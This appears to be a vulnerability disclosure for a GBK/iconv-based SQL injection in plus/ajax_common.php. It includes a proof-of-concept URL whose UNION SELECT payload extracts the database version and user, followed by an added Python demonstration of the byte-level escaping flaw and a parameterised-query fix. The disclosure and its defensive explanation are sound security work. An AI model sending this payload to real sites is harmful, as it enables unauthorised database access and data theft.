`$_GET['query']` is passed to `$gbk_query`, and then `$gbk_query` goes through iconv,
so special input that iconv acts on, such as wide characters (for example %8c%27), Chinese characters or something similar, gets into the SQL and finally leads to SQL injection.
plus/ajax_common.php
![image](https://user-images.githubusercontent.com/703783/74736998-e4761900-528e-11ea-87c7-1379d83078c4.png)
poc:
upload/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,concat(version(),user()),3%23%27
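Added example, not code from the report or the affected project: a byte-level look at why a UTF-8 to GBK conversion defeats byte-wise quote escaping, and why binding the value as a parameter avoids the problem. It assumes the input is escaped in the style of PHP `addslashes()` around the iconv step; all function names and the `hotword` table are hypothetical, and the sample value is the character and quote from the report without the rest of the query.

```python
import sqlite3

SAMPLE = "錦'"  # constructed sample: '錦' is E9 8C A6 in UTF-8 and E5 5C in GBK

def php_addslashes(data: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP addslashes() (NUL handling omitted)."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):      # ' " and backslash get a backslash prefix
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def bare_quotes(literal: bytes, gbk_aware: bool) -> int:
    """Count single quotes a string-literal parser would see as unescaped."""
    i = count = 0
    while i < len(literal):
        b = literal[i]
        nxt = literal[i + 1] if i + 1 < len(literal) else None
        if gbk_aware and 0x81 <= b <= 0xFE and nxt is not None and 0x40 <= nxt <= 0xFE:
            i += 2                        # one double-byte GBK character
        elif b == 0x5C:
            i += 2                        # backslash escapes the following byte
        else:
            count += (b == 0x27)
            i += 1
    return count

def escape_then_convert(value: str) -> bytes:
    # Assumed order: escape the UTF-8 bytes first, convert to GBK afterwards.
    return php_addslashes(value.encode("utf-8")).decode("utf-8").encode("gbk")

def convert_then_escape(value: str) -> bytes:
    # Reversed order: convert to GBK first, then escape byte-wise.
    return php_addslashes(value.encode("gbk"))

def bound_lookup(value: str) -> list:
    # Hardened form: the value is bound as a parameter, never spliced into SQL text.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE hotword (w TEXT)")   # hypothetical table
    con.execute("INSERT INTO hotword VALUES (?)", (value,))
    return con.execute("SELECT w FROM hotword WHERE w = ?", (value,)).fetchall()

if __name__ == "__main__":
    for name, data in (("escape->convert", escape_then_convert(SAMPLE)),
                       ("convert->escape", convert_then_escape(SAMPLE))):
        print(name, data.hex(" "), "byte-wise:", bare_quotes(data, False),
              "GBK-aware:", bare_quotes(data, True))
    print("bound:", bound_lookup(SAMPLE))
```

Each ordering leaves a bare quote under one of the two parser interpretations, so reordering the escape and the conversion is not a fix; bound parameters (or charset-aware escaping on a connection whose charset matches the data) are.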